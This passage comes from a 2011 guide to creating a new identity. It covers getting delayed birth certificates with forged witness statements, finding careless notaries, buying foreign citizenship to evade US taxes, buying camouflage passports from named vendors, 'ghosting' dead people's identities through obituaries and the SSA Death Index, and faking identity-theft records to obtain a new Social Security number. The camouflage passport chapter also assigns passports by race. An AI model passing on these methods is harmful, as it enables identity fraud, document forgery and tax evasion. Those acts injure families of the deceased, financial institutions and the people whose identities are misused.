that it can +take three to six months to get a BC that way! If they offer +rush service for a few bucks more, use it. +Let Us Pray! +Here is some interesting information on the Mormon religion. +Pay attention, you may need to know about this stuff. +Federal law considers all birth certificate records public +records. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 88 - +Reproduction in any form is prohibited without written permission. + +The Mormon religion allows Mormons to list their relatives +going back three generations on a form and perform what +they call "Ordinances For the Dead". +They believe that this ritual will, in effect, yank these +relatives from the bowels of hell and instantly transport them +to heaven. (This is no joke - the Mormons are very serious +about this stuff). And they are a very rich and powerful +organization. So you can see that the local officials who are +seeking to seal the records regularly come into conflict with +Mormons seeking BCs for religious reasons. +The vital records clerks fear the Mormon church because the +Mormons are in the habit of sending in teams of lawyers +when a church member is denied the BC of a relative. A +number of clerks and managers have actually been +terminated and fined for illegally restricting access. +The Mormons have challenged restrictions in courts +numerous times and have never lost. (After all, you wouldn’t +want Grandma to spend eternity in hell just because you +couldn’t get a slip of paper from some uncooperative clerk +now would you?) +Most identity-changers request a birth certificate via rush +service by specifying that it's for a pre-employment security +clearance. This usually gets fast service. If you are denied a +BC for some phony reason, send them back a note +mentioning the Mormon temple you belong to. I had one BC +Federal Expressed to me at no cost when I used this trick. +The clerks really fear the Mormon Church. +Each state has it's own unique birth certificate request form. +Fill them out requesting that they search for a copy of your +new identity BC. They should cost around 5 to 10 bucks +each. Send a money order, not a check. Users suggest +requesting the birth certificate in a new name when you +know for sure it doesn't exist. +After the search, they will return two forms. The first one will +be a simple form with a box checked indicating that their +search was unsuccessful. +The second form will be an application for "delayed record of +birth". They assume that if you’re alive and breathing, you +must have been born. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 89 - +Reproduction in any form is prohibited without written permission. + +And if they don’t have a record of your birth – they’ll want to +add you to their records. Besides, you'll need to do whatever +you have to get a birth certificate - no birth certificate equals +no security clearance equals no job! +With this form you can create a new birth certificate and +have an official, verifiable birth certificate entered into the +official records. Unfortunately, they will require some +documentation to substantiate your claim but some of the +documents they recognize aren't all that difficult to come up +with. (See the list below) +They will provide you with a list of documents that they will +accept as proof of your birth claim. Some states require all +sorts of extremely difficult-to-obtain notarized documents +while other states are much less demanding. And the rules +are constantly changing which keeps it interesting. +ID Documents Accepted by Some States +(to qualify for a delayed birth certificate) +Church Records +Medical Records +Baptismal Certificate/Circumcision Certificate +Military ID or Discharge Papers (DD-214) +School Transcripts +Voter Registration Card (ridiculously easy to obtain) +Marriage license (or completed application form) +Census Record +Social Security Number Confirmation (from SSA) or SSN +Application +Insurance Application +Lease Contract or Application +Your Child's Birth Certificate +Newspaper Notice of Your Birth +Family Bible Record +Employment Record +Sibling Birth Certificate +College Records/Transcripts +Employment Application +Union Membership Card +© Copyright 2011, Ariza Research, All rights reserved - ABP - 90 - +Reproduction in any form is prohibited without written permission. + +Note: Some states require that these documents be at least +five years old or that they were issued after your fifth or tenth +birthday. Ask for details. +As you can see - there's plenty of room to maneuver here. +Some of these documents are much easier to obtain than +others. One particularly interesting document they will accept +is a signed statement from someone who was present at +your birth. Some have reported that such a statement can be +easily forged. A close friend of your mother's might very well +have witnessed your birth. +Did you know that almost a third of the people walking the +streets never had their birth recorded? It’s true! Births were +not recorded for a variety of reasons. Some parents +belonged to religions that actively discouraged registering an +infant's birth. +Some children were born in such poverty that the paperwork +was the last thing on the parent's mind. Some were born in +remote areas where access to government was severely +limited. +During the free-love 1960s many unmarried couples had +kids and had no interest in filling out "big brother's" forms. +Some babies were born in cults who discouraged such +registration. And some were adopted which leads to a host +of birth registration problems. +Some births were never recorded because of strong +religious objections. Quakers and others refused to register +their newborn babies. If someone's parents were religious +Quakers it would easily explain why there was no record of +their birth. +One lady used the following approach. She obtained a +newspaper from the town nearest the place of birth. She +scanned the obits and found a local deceased lady who was +born around the same time as their mother. Here is a lady +who could have been present at your birth. Any statement +she signed just before her death would be legally yet very +difficult to verify. Her home address would be the nursing +home in which she last lived. Her signature would be shaky +and a bit weak due to her advanced age. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 91 - +Reproduction in any form is prohibited without written permission. + +But you should scan the list of required documents and +decide for yourself which documents will suit your purposes. +Sometimes a lesser document combined with a letter of +explanation will do the trick. +Again, if your request looks honest and respectable they will +probably cut you some slack and issue your BC. If you fail at +your first attempt, don’t give up – try again elsewhere. +To substantiate your new identity, you may need one or +more notarized documents. Like any group of people, some +notaries are more professional than others. +While most notaries are careful, if you shop around you may +be able to find one that is not too bright or is too rushed to be +careful. With some patience you can get almost anything by +them. There are those notaries who are much more +interested in their fee than the document's they're asked to +verify. +The "Slow and Hard" Checklist +- Find three sets of parents +- Make up three new names +- Send off requests for your non-existent BC to each state +- When forms arrive: Choose the state that requires the +least difficult proof - Then Apply for a "Delayed Record of +Birth" +- Receive new BC +- Use the new BC to get a drivers license +- Apply for a new social security number +© Copyright 2011, Ariza Research, All rights reserved - ABP - 92 - +Reproduction in any form is prohibited without written permission. + +Chapter 5 +Foreign Citizenship Method +Recently ABC news reported on a new government program +designed to discover and identify Americans who live +overseas and don't bother to file tax returns with the IRS. +Under this new program, when American expatriates go to a +US embassy to renew their US passports, they are asked for +their social security number. The number is then checked +against a growing database of expatriate tax dodgers. +Remember, under IRS rules ANY money you earn anywhere +in the world, be it through wages, dividends or corporate +profits, is fully taxable by the IRS no matter where in the +world you live and no matter what local taxes you are +required to pay! The US is the only major country on the +planet that is arrogant enough to make such a ridiculous +demand. I doubt that Adolf Hitler would have considered +making such an obviously unenforceable demand! +Many ex-pat tax avoiders now simply let their US passport +expire and then replace it with one from a new country. (one +that doesn't bother to track and tax their citizens outside their +own borders.) +Many countries have programs specifically designed to meet +ex-pat Americans' special needs. They offer "economic +citizenships" or "economic development citizenships". The +newest entrant in this game is Grenada. By purchasing a +Granadian citizenship you get a passport that is accepted in +over 60 countries without having to bother with entry or exit +visas. +Many tax dodgers have their own businesses incorporated +(anonymously) in Panama, Belize or Grenada. These +countries have very low, or non-existent taxes on small +businesses. +And their governments couldn't care less about foreigners’ +travels or business activities as long as they don't draw any +international attention. You can't be sued. (No one can find +out exactly who owns your corporation as it's registered only +in your agent's name) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 93 - +Reproduction in any form is prohibited without written permission. + +You can travel without being tracked (provided you book +your tickets outside the US) and Uncle Sam will have no +idea where you are or what you're up to. You'll drop right off +the IRS's radar! +And keep in mind that there are very few extraditions to the +US for tax or business reasons no matter where in the world +the suspect lives. +Your new citizenship can usually be arranged without having +to pay a personal visit to "your" new country. (This is a +problem as the government will be fully aware of if you travel +on a US passport and arrange your trip through a US travel +agent). +If you take this route be sure to ask if you can change your +name at the same time. Most countries will ask for a "police +statement" proving that you are not wanted by the authorities +in your home country and are not a fugitive fleeing justice. +They may also ask for a similar Interpol clearance. A written +statement from a friend or clergyman attesting to your good +character may also help move things along. +Once the required documents have been received (reports +have surfaced that some applicants have used forged +documents rather than go through the hassle of procuring +the genuine items), you get your new passport, citizen's +identification and local drivers license, all in your new name. +From there it's simple to open a bank account that provides +a MasterCard or Visa debit card (and ATM card) that +provides you with untraceable worldwide access to your +funds no matter how far you wander. +A Russian friend recently obtained a Granadian citizenship +and has transferred his family savings into a Panamanian +bank. He then set up an anonymous Panamanian +corporation to run his new business. Rumor has it that the +Russian government is planning on confiscating the +passports of it's wealthiest citizens to help slow the flow of +capital out of the country. +Could something like this happen here in the US? Several +billionaires have recently moved to the Bahamas taking their +considerable fortunes with them. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 94 - +Reproduction in any form is prohibited without written permission. + +Numerous outfits have appeared on the Internet that can +quickly and easily transfer your funds to offshore locations. +All we can say for sure is that Uncle Sam is extremely +worried about this rapidly growing trend. (According to a +recent US State Department study there are now over +200,000 American ex-pats now living in London, England +alone!) +Recent US federal laws have been passed aimed at +reducing or eliminating the death taxes that many of these +rich expatriates are objecting to in an effort to reverse this +tide of rich refugees. +The US Congress is currently reviewing the laws and +regulations regarding the transferring of funds offshore. You +can expect legislation to be passed during the next few +years that will drastically increase the penalties for +transferring funds out of the US. +If you do choose to deal with an offshore bank - be sure to +pick one that has NO branches or other operations within the +US. If they have some business here, the US government +can gain access to their records by dragging them into a US +court and threatening to close down their US operations. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 95 - +Reproduction in any form is prohibited without written permission. + +Chapter 6 +Camouflage Passport Method +Just when you think you’ve heard of every possible way to create +a new identity – a completely new wrinkle pops up. We get a lot of +very interesting feedback from our readers and over the past few +months we’ve been hearing quite a bit about an entirely new +approach to creating a new identity. +Americans who travel overseas have a very real problem. When a +terrorist hijacks an airplane they usually seize the passports of +their captives in an effort to single out the Americans and Israelis +for murder or torture. Let’s face it, for whatever reason Americans +are high-priority targets. +This need has given rise to a whole new type of product. – enter +the camouflage passport. For a fee there are several firms that +advertise widely on the internet who will sell you a fake passport +which you can carry with you during your travels. This fake will +appear to be issued by some small, unimportant country that no +longer exists or never did (your friendly terrorist won't have any +way to verify a passport’s validity). It will also include some very +official looking exit and entry stamps that appear to document your +recent travels +If your plane is grabbed, you simple give the terrorists your fake +passport instead of your US version, which avoids you being +identified as an American. Carrying one of these beauties can +quite literally save your life. US intelligence agencies both civilian +and military have long used this approach and have been happily +issuing their key people alternative identity travel documents for +this same reason. +Buying one of these phony passports is completely legal as +they’re issued in the names of small colonial countries that no +longer exist - at least not officially. Some of them are very well +done and look very official. One of the more popular passports is +the old red Soviet one. Did you know that there are over six million +Russian citizens who still carry an old-style red Soviet passport? +The Russian government wants to replace them but money is very +tight in Russia these days so it will probably take a decade or +more to update them all. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 96 - +Reproduction in any form is prohibited without written permission. + +These passports can be purchased bearing the following +national identities: +British West Indies (never existed – is a group of English +speaking Caribbean islands. Including British Virgin +Islands, Cayman Islands, The Turks and Caicos Islands +and Montserrat – This passport would appear to be British +and would appear to be issued by islands that are still +officially British owned) +British Honduras (Now Belize) +British Guiana +Soviet Union (Now Russia) +New Hebrides +Dutch Guiana (Now Surinam) +Netherlands East Indies +South Vietnam +Spanish Guiana +Eastern Samoa +New Grenada +Republic of Zanzibar +You can get your new passport in any name you choose (of +course the name should match your new nationality and your +ethnic appearance) and most of these firms also include a driver’s +license (both national and international versions are available) and +a resident identity card to support your new identity. One throws in +a very impressive employee ID for a major international +corporation. +Of course using a camouflage passport to attempt to enter or +leave a country would be very unwise and completely illegal. But +from what we hear there are a number of brave souls out there +who have done just that. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 97 - +Reproduction in any form is prohibited without written permission. + +If you attempt to travel in Europe using your new Soviet passport, +you will most certainly run into problems. Could someone use a +camouflage passport from a Latin American nation to get into a +south pacific island? Or perhaps you might get into a South +American nation using your new Soviet passport. +We've even heard of those who have used their new identity +documents to obtain a new social security number/card. The +clerks at drivers license bureaus have no way to verify a foreign +passport and will usually just get rid of you as fast as possible. +Only the INS and the cops can verify a green card. Everyone else +is left to guess. +Do you look or sound like a foreigner? If you do – so much the +better! And even if you look like a sheet-white corn-fed Methodist +from Nebraska, there are always those old British colonial +countries where English is the official language. If you look a little +like an eastern European, you might want to consider the Soviet +passport. If you’re Hispanic you might take a look at a Central +American version. An oriental might want to consider a South +Vietnamese passport. +A reliable source has informed us that there are several tens of +thousands of Hispanics living (and working) in California who are +using exactly this approach. +If you can learn to speak a bit of Dutch, you might pass yourself +off as a resident of Dutch Guiana. When Dutch Guiana became +the independent nation of Surinam, the locals were offered full +Dutch citizenship if they moved to Holland. Some citizens decided +to stay and retain their old passports and other identity +documents. +Blacks should look into either a Dutch Guiana or British West +Indies passports, as many of their citizens are black as they're +descendents of African slaves. +When British Honduras became the independent country of +Belize, many citizens chose to keep their old passports so there +are still many of them around. Of course English is the official +language so all you’ll need to learn is how to drink warm beer! +The group of south pacific islands formerly known as the New +Hebrides became Vanuatu, which is fast becoming one of the +premier offshore banking centers of Asia. (If you hunger for real +personal and financial privacy, you might find Vanuatu very +interesting.) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 98 - +Reproduction in any form is prohibited without written permission. + +You should also know that the much-forged “green card” can be +obtained quite easily on the black market. (60 minutes +demonstrated just how easily when they bought one on the streets +of Los Angeles in a half hour or so.) +They're widely sold in the border areas along the Mexican border. +Green card forgery is fast becoming big business wherever illegal +aliens are found. Besides, there are so many different versions of +the green card out there that no one really knows a forgery when +they see one. +You can find many varied sources for camouflage passports by +doing a quick search on any of the major search engines (I prefer +google.com as it's quite comprehensive) under "camouflage +passport". Prices run from around $195 to over $600 so shop +around for the best deal. +Update: A mail-order firm called NIC Law Enforcement +Supply sells a nice camouflage passport for $249 (a very +good price given the quality). You provide two passport style +photos (in different clothes and perhaps different hair styles +so they look like they were taken on different dates). They +provide a handmade camouflage passport and a matching +drivers license. +They also provide entry and exit stamps to make the +passport look used. Your passport/drivers license can be +issued in any name you like. You can also specify a new +date of birth. Two supplemental ID documents are provided +(one is a drivers license while the other might be a resident +ID or a national ID card of some sort). Unfortunately NIC +doesn't allow you to chose which country you prefer. Instead +they ask you which part of the world you'll be traveling in and +then promise to provide a passport from a distant part of the +world. +They even provide a home address in your new country. You +can also list a wife and children. +They also sell a nice variety of ID products including some +very useful holograms, seals and a ton of official looking +badges for collectors. NIC Law Enforcement Supply can be +reached at 1-888-642-0007. Ask for their latest catalog. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 99 - +Reproduction in any form is prohibited without written permission. + +Their address is: +NIC Law Enforcement Supply +500 Flournoy Lucas Road Bldg. #3 +Shreveport, LA +71135-5950 +You might at this point be asking yourself why those in +power would allow these passports to be sold so openly? +Official looking documents like these are obviously very +useful to freedom loving types so why don't they just ban +them? The answer is simple. +The rich and powerful elite in the US use them all the time +and find them quite useful (for protection during highjackings +and for opening offshore bank accounts) so they remain on +the open market even though their use may violate several +federal laws. +A quick note here: I can't seem to find anything specific on +the subject but one camouflage passport site has shut down +due to "the new government regulations regarding +camouflage passports". +As of 7-08 here are some active camouflage passport sites: +(I cannot endorse these firms nor their products however) +http://www.privacyworld.com/auto/campp.html +http://www.immigration-world.com/interest/haki-eng.shtml +http://www.finor.com/en/camouflage_passports.htm +http://www.expatworld.org/book8.htm +http://australianz.topcities.com/camouflage.htm +http://www.republic-of-lomar.org/information/procedure.htm +http://www.maildropnet.com/dlidpp/camel.htm +http://passports.netfirms.com/camouflage.html +http://www.vienna.cc/networld/camou.htm +© Copyright 2011, Ariza Research, All rights reserved - ABP - 100 - +Reproduction in any form is prohibited without written permission. + +Some of the sites above list a wide range of other ID products but +I'd be very skeptical of their quality claims. Any firm located inside +the US will certainly be peddling garbage (or they'd quickly end up +in jail). +Birth Certificate Numbering +There’s one small hitch here. There are scads of sites out +there selling blank birth certificates and templates. Avoid this +mass marketed junk. Big brother is on to you and has +provided their clerks with books full of samples of these +clunky fakes. Anyone who attempts to use one will soon end +up in a world of trouble. +A quick note concerning the numbering of birth certificates: +The first digit is always a one for those born in the USA. +Then there is a dash and a second number, which is the +two-digit year of birth. This is followed by a random group of +numbers assigned locally by the issuer. When you create a +"new" birth certificate, be sure the number follows the +following rules: +If the registration number is: +#1-73-54898 +The code breaks down as follows: +1- -Born in the USA +73- -Born in 1973 +54898 -Random registration number +In the past a good story and a single document such as a +birth certificate and/or a baptismal certificate (or if you're +Jewish a circumcision certificate is more or less the same +thing) would get you through. Now you'll need more. +You'll need to assemble a collection of what used to be +called "wallet stuffers". The kind of lower quality ID that's +much easier to come up with yet still helps establish your +identity and support your story. +So what's the bottom line here? You'll have to be prepared +more thoroughly than before. More planning and careful +execution will be required. But for the time being not all that +much has changed. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 101 - +Reproduction in any form is prohibited without written permission. + +Keep in mind that as of the summer of 2004, there’s still very +little cross-referencing of birth and death records across +state lines. But stay tuned as legislation passed and signed +into law in early 2004 provided $350 million for just that +purpose. But if you stop and think about it – it will take years +before even part of the records are correctly updated. +But how could they ever know where the man was born or +where his birth certificate is recorded? They could perform a +state-wide search within Alabama but what would they do if +no birth record could be found? With over 7,000 national +offices authorized to create birth certificates, how could they +ever hope to locate his birth certificate? +At some point in the distant future all these records will be +computerized under (you guessed it) your social security +number. Then nation-wide searches will be both fast and +simple and the records will be 100% cross-referenced. But +given a lack of funding and pressure from civil rights groups, +those days are easily a decade away. +Another little tip regarding birth certificates – certified copies +are easier to obtain in the following states: California, +Kentucky, Maine, Massachusetts, Minnesota, Nebraska, +New Jersey, North Carolina, Ohio, South Dakota, Vermont, +Washington and Wisconsin. The rest restrict access to birth +records in some way. If you run into a problem in one state, +move on to another. Some states still regard their vital +records to be public property and open to anyone who asks. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 102 - +Reproduction in any form is prohibited without written permission. + +Chapter 7 “Ghosting” +Ghosting is an older method of identity theft that has a very +interesting and colorful past. +Way back in the early 1900s blacks who lived in the south +would obtain the birth certificates of whites their own age +who had recently died, and use the BC to resurrect the +identity of the departed and assume it as their own. +It’s hard to imagine but back then before civil rights, black +people were being lynched by mobs of white people who +seldom if ever were convicted of the crime for the simple +reasons that back then only whites could serve on juries. +(For an example of this kind of racist “justice” watch the +movie To Kill a Mockingbird.) +Also, though blacks could enter the military, in those years of +racial segregation blacks could only work at menial jobs or +very dangerous tasks such as loading ammunition in +facilities that all too often suffered horrendous explosions. +Blacks were often barred from voting in elections using +sleazy tricks like requiring a reading test to qualify to vote. If +an “uppity” black should have the nerve to ask to vote they’d +be shown a Chinese newspaper and asked if they can read. +Few blacks voted in those dark days. +In addition, universities back then rarely if ever admitted +blacks. So from the above you can see why a light-skinned +black who could “pass” as white would be eager to obtain a +birth certificate that officially listed his race as white. +Most identity theft involves either financial gain though the +sale of the identity or the use of the identity to make +purchases using the good credit rating of the target. +When the credit rating of the target individual was destroyed +and the collection agents began to prowl, the identity thief +would discard the identity and move on to the next victim. +But in ghosting you have an identity theft of an entirely +different kind. The intent of the ghosting thief is to keep the +dead person’s identity alive and assume it as their own. Far +from destroying it, most ghosters protect and even develop +the identities they acquire. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 103 - +Reproduction in any form is prohibited without written permission. + +Some people assume the identity of a dead friend or +associate simply because their own identity has been +compromised either through the accumulation of debt, a +criminal record or to escape someone who is on their tail. +An entirely new identity can be created on paper using fake +ID but this kind of identity has serious shortcomings. Such +an identity could never be used to any kind of dealing with +the federal government. +You could never obtain a passport, obtain any kind of +financial benefit or land a government security clearance or +job. But through ghosting you get an established identity that +will pass muster with almost any government situation (with +the exception of a high-level security clearance which would +almost always expose any kind of identity change.) +Banks routinely hold financial accounts open and potentially +active for five or more years before closing them and +attempting to notify account holders of their concern. +This allows a ghoster plenty of time to pick up the pieces and +breathe new life into a dormant identity. +Today ghosting is useful as in many situations someone’s +death isn’t recorded in government records properly. This +throws open window to ghosters. +In the distant past ghosting was a simple matter of getting +someone’s birth certificate and using it to start a new life. +You could call yourself any name you chose and get away +with it. +But today creating fictitious identities in made-up names is +no longer a workable solution. +This is because each American has a unique social security +numbered account. This makes it much more useful to seize +the identity of someone who has a valid and active social +security number. +Creating an identity that isn’t linked to a social security +number wouldn’t be of much use these days - hence the +interest in ghosting. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 104 - +Reproduction in any form is prohibited without written permission. + +It’s much easier for a female to assume the identity of a +dead person. This is because women change their names +each time they marry. Detecting a female ghoster is much +more difficult as the death certificate and the birth certificate +will show two different surnames. +Also women are prone to live with men who support them +either with the benefit of marriage or not. Either way they +don’t have to earn a wage which leaves their work history +wide open. For a female a break of several years could be +easily explained away as a maternity break when a child was +born. +One ghoster published a guide in which he advised potential +ghosters to read the local papers in search of a family that +was killed in some out-of-state location. +Any of the identities of the departed could be assumed by a +ghoster. Also, because so many relatives died at the same +time there would be very little chance that some relative +would be inquiring about your activities. +Because the deaths occurred outside their native state, the +death certificates wouldn’t be likely to be properly recorded +in state records. +Transsexuals have been known to become ghosters in order +to obtain clean identity credentials of someone of the +opposite sex. A man could easily become a woman +(complete with an official birth certificate that “proves” that +they are in fact a woman.) +Many career criminals have used ghoster identities to +escape the effects of having a long criminal record. Some of +then have an honest desire to reform and “go straight” while +others need a new identity in order to continue their life of +crime. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 105 - +Reproduction in any form is prohibited without written permission. + +The Master Ghoster +Ferdinand Waldo Demara was the master of ghosting. In his +life he posed as a physician, a monk, a civil engineer, a +psychologist, a lawyer, a sheriff’s deputy, and a prison +warden. His exploits were so famous they made a movie +about his life which starred Tony Curtis (“The Great +Imposter”). +Demara began his long career as a ghoster by ghosting the +identity of an Army buddy, Anthony Ignolia. Then he +promptly went AWOL. He then faked his suicide and +borrowed another identity, Robert Linton French and +assumed the man’s role as a psychologist eventually +teaching psychology at a Pennsylvania college. +Later while studying at a seminar he met a physician named +Dr. Joseph C. Cyr, assumed his identity and went on to work +as a trauma surgeon aboard a Royal Canadian Navy +destroyer during the Korean War. He performed so many +surgeries that when his deception was brought to the +attention of his commanding officer, he refused to believe it! +Demara collected identities the way some people collect +stamps. When he met an interesting individual, or got +himself into a jam, he always had it in mind to grab that +person’s credentials and live that person’s life – assuming +whatever role it demanded. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 106 - +Reproduction in any form is prohibited without written permission. + +The successful American film actor Wallace Ford actually +started out life as Samuel Jones born in England. At the +tender age of 15 Jones became a hobo riding the rails of +Canada and the U.S. +During an accident a close friend named Wallace Ford +suffered a fatal injury. Jones assumed his name and went on +to become a successful film actor. Shortly before his death in +1966 he finally released the details of his deception. +You can always depend on obituaries to provide the +personal data you need but if you search around the web +you’ll no doubt find sites that will for a fee obtain personal +information on just about anyone including their social +security number. +The Social Security Administration publishes a Death Index +that is chocked full of dead people along with their assigned +social security numbers. +There are also legacy sites that list tributes and memorials to +the dearly departed posted by friends and families. These +sites are usually loaded with personal details that any +ghoster would find extremely useful. +Recently the state of Indiana did a check and discovered to +their dismay that in that year over 100 Indiana driver’s +licenses had been issued to deceased persons. +Most families fail to notify the social security administration +of the death of their loved one. Because they’re usually +overcome with grief they also don’t bother to notify the three +largest credit reporting agencies. +It would also be a good idea for family members to routinely +obtain a copy of the deceased’s credit file from time to time +to ensure that no one is using it. It unusual activity is found, +the police and the relevant creditors should be immediately +notified and provided with copies of the individual’s death +certificate. +The obituary that’s published should not contain too much +information. The birth date of the individual should be +eliminated as should their place of birth and their last known +street address. Their parent’s names are also useful to +anyone seeking a copy of their birth certificate. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 107 - +Reproduction in any form is prohibited without written permission. + +Very, very few families actually take the above steps which +makes ghosting a viable approach to identity seizure. +Other Types of Identity Theft +There are approximately seven different categories of +identity theft out there. +1. Financial Identity Theft +Most people tend to think of identity theft in financial +terms so this is by far the most widely held concept of +identity theft. The thief assumes another’s identity and +uses it to seize bank accounts or obtain credit using +another’s good credit rating and then defaults on the +loan. +2. Identity Cloning +In this case the identity thief assumes someone’s +identity and then creates other fake ID documents to +support it’s use. +In this case there is no intent to commit financial fraud +but instead the goal is to live and work using the new +identity. This kind of theft is common with illegal aliens +and criminal fugitives. +3. Criminal Identity Theft +In this case the identity is useful to criminals in +escaping their accumulated criminal records. The new +identity is often used when arrested for various +crimes. This creates terrible problems for the innocent +individual involved. +4. Synthetic Identity Theft +In this case the victim isn’t an individual but instead +the target is a bank or other financial institution. When +the fraud is discovered, the bank is left holding the +bag as the individual that is liable never existed in the +flesh. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 108 - +Reproduction in any form is prohibited without written permission. + +5. Phishing +Phishing refers to a tactic where Internet users are +lured to sites that appear to be legitimate financial +sites where they are tricked into revealing sensitive +financial information such as credit card numbers, +bank account numbers or account passwords. +The people who run these sites can use that +information for profit or they can sell it for ready cash. +6. Pharming +Hackers using advanced hacker tools can now enter +into poorly-protected Internet sites and seize large +blocks of personal information. +A number of major retail chains have been humiliated +to find that whole customer databases complete with +credit card numbers and home phones have been +revealed. +7. Ghosting +Here we have an individual who assumes the identity +of another intending to maintain it and use it into the +future. +One reason ghosting is so popular has to do with how +rarely ghosters get busted. It happens to be sure but +not all that frequently. +In most cases no individual is harmed as the +individual most involved is usually dead. It’s the +financial and other institutions that ends up being +harmed. +And ghosting is very common. In a 2007 interview Jay +Foley of the San Diego based Consumer Advocacy +Group reported that in 2004 nearly 400,000 new +checking accounts were opened in the names of +deceased persons. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 109 - +Reproduction in any form is prohibited without written permission. + +National ID Update +In the new "Homeland Security" bill you'll find the following +rather interesting language: +"Nothing in this act shall be construed to authorize the +development of a national identification system or card." +Here's some more good news. The current administration +has expressed their disinterest in establishing a national ID +card on many occasions. But of course there's no guarantee +that future administrations will see things in the same way. +Talk about strange bedfellows. This issue has so inflamed +privacy advocates that the conservative Eagle Forum and +the liberal ACLU joined forces to fight any attempt by the +federal government to establish federal standards for the +issuance of state drivers licenses. +They view this approach as an attempt to transform our +driver’s license into a national ID card. According to these +two groups federal interference in the issuance of drivers +licenses "would be a severe hit to basic privacy rights in +America". +This whole subject is so politically sensitive that the White +House itself told it's minions that they are never to use the +term "national ID card" nor are they to enter into any kind of +debate on the subject. The entire subject is strictly taboo. +But there will be changes ahead that will reduce our privacy +and increase government monitoring and control of our +movements. In the year ahead the aviation industry will be +establishing a "trusted traveler" system. The plan now on the +table would make the system completely voluntary and will +be run by a private firm. +You fill out a comprehensive application that includes a +wealth of personal information. The security company will +then check you out by verifying as much of the information +as possible. Verification will be the rule - they will take little +or nothing at face value. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 110 - +Reproduction in any form is prohibited without written permission. + +Only after the information you’ve provided has been carefully +verified would your new card be issued. With it you bypass +the long security lines at the airport and zip through a quick +scan of your card and you're quickly off to your plane while +the other passengers stand on those long slow lines. +Since the system is entirely voluntary, you could choose to +not apply and choose to stand in line. The choice is yours. +This system is already in pilot operation in some airports. +Could this kind of "trusted" system expand into other areas +of public life? +Way back in 1961 former President Dwight D. Eisenhower +warned us that the greatest challenge to our freedom would +come from a combination of military contractors and the +pentagon which he labeled "The Military-Industrial +Complex". Are we now entering Eisenhower's nightmare? +Only time will tell. +In this edition we have several new systems to report on. I +want to thank those who have provided feedback and taken +the time to share their experiences. We know you'll find the +details as interesting as we did. +Social Security Bureaucrats Finally Give In! +Update: I had an interesting chat with a social security +worker recently. He revealed that in 1999 the social security +administration had issued only 155 new social security +numbers under the program discussed below. In the year +2000 the number grew to over 1500 and this year the +number will be much higher. When I asked how high, he said +"at least ten times the 2000 levels". This radical change in +policy should be used by anyone who can qualify. +For far too many years the bureaucrats at the social security +administration have steadfastly refused to allow individuals +to change their social security numbers no matter how dire +their personal circumstances. Several women and children +have recently been murdered simply because they were not +allowed to change their social security numbers (and thus +escape their pursuers). +© Copyright 2011, Ariza Research, All rights reserved - ABP - 111 - +Reproduction in any form is prohibited without written permission. + +But it looks as though all the dead bodies and bad press are +at long last having an effect. The social security +administration has now announced a new policy that should +be of interest to those who can qualify. +Now for the first time the bureaucrats will actually let you +change your social security number if you can prove that +you’ve been the victim of identity theft. (An individual could +qualify for a number change and then later legally change +their name) +Of course the paper-pushing bureaucrats will require that +you document the theft of your identity. At first the +requirements may seem strict and difficult, but they're not if +you examine them in detail. +To qualify under this new policy, you'll need a credit report +that shows that you've had your identity stolen, usually for +financial reasons. Someone has submitted a credit card +application using your name and their address. +They usually use the address of a unsuspecting friend, or +they hire a secretarial service to provide an address or they +rent one of those commercial mail boxes using a fake id. +Once they have a new credit card in your name, these +criminals start spending. Once they start using the card, their +payment history is going to pop up on your credit report. This +is the proof that identity theft is going on. Once your credit +file has several of these unauthorized cards on it, you may +qualify for a new social security number. +(Several especially creative (and dedicated) individuals have +actually created all the signs of identity-theft in their own +credit records in order to get a new social security number +though I'm sure some aspect of what they've done is illegal.) +If this happens to you, call your credit-reporting agency and +report the violation immediately. Ask for a copy of your +current credit file. Check with all three major credit-reporting +agencies to be sure you have them all. Assemble all the +documentation you can find. You might even want to talk to +a lawyer, as they may be able ease the social security +number change process along. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 112 - +Reproduction in any form is prohibited without written permission. + +Here are some details on identity theft, which should help +you protect yourself against this growing problem. If you live +in an apartment identity thieves often pry open individual +mailboxes in order to obtain banking and other mail that will +give them the personal information they need to steal your +identity. +After a break, you may have noticed that your mail flow was +suddenly restored but you did notice that your normal +monthly bank statement didn't arrive as usual. Identity +thieves file change of address forms that interrupt their +target's mail for three or four day. This is the usual story for +victims of identity theft. +If you feel that you now qualify for a number change but can't +get the SSA clerk to agree. Politely ask for their supervisor +and see if they will be more sympathetic. If they refuse, take +the whole matter to your senator or congressman. It's their +job to help you in your struggles with government agencies. +Though they will never admit it, government bureaucrats +deeply fear letter writers and complainers. As long as no one +complains to a higher authority, these clerks can get away +with murder (which is what they've been doing for some +years now by ignoring abused spouses) but when you get +someone with some real power involved, the whole situation +can rapidly change. They know that one well-worded letter +can land an entire agency in hot water. +If your clerk is still refusing you help, don’t direct your anger +toward the clerk but instead keep reminding them of how +much grief this identity thief has put you through and how +badly you need some relief. Demand that the clerk provide +you with the official document that details the provisions of +the new identity theft policy. Information is power and a +careful review of their policy will give you the ammunition +you need to prove your claim. Also demand information on +the Social Security Administration's appeals process. +Armed with solid documentation and some Washington +influence, you should be able to win yourself a new number. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 113 - +Reproduction in any form is prohibited without written permission. + +Here are the Social Security Administration's notes (taken +from their official manual): +1. You must prove to their satisfaction that someone else is +actually using your social security number to: +1. Illegally apply for government benefits (welfare, +food stamps, unemployment compensation, and +educational loans). +2. Obtain credit/credit cards (in your name). +3. Obtain employment (illegal aliens, fugitive +criminals). +4. Pursue other illegal activities (obtaining benefits +under workers' compensation). 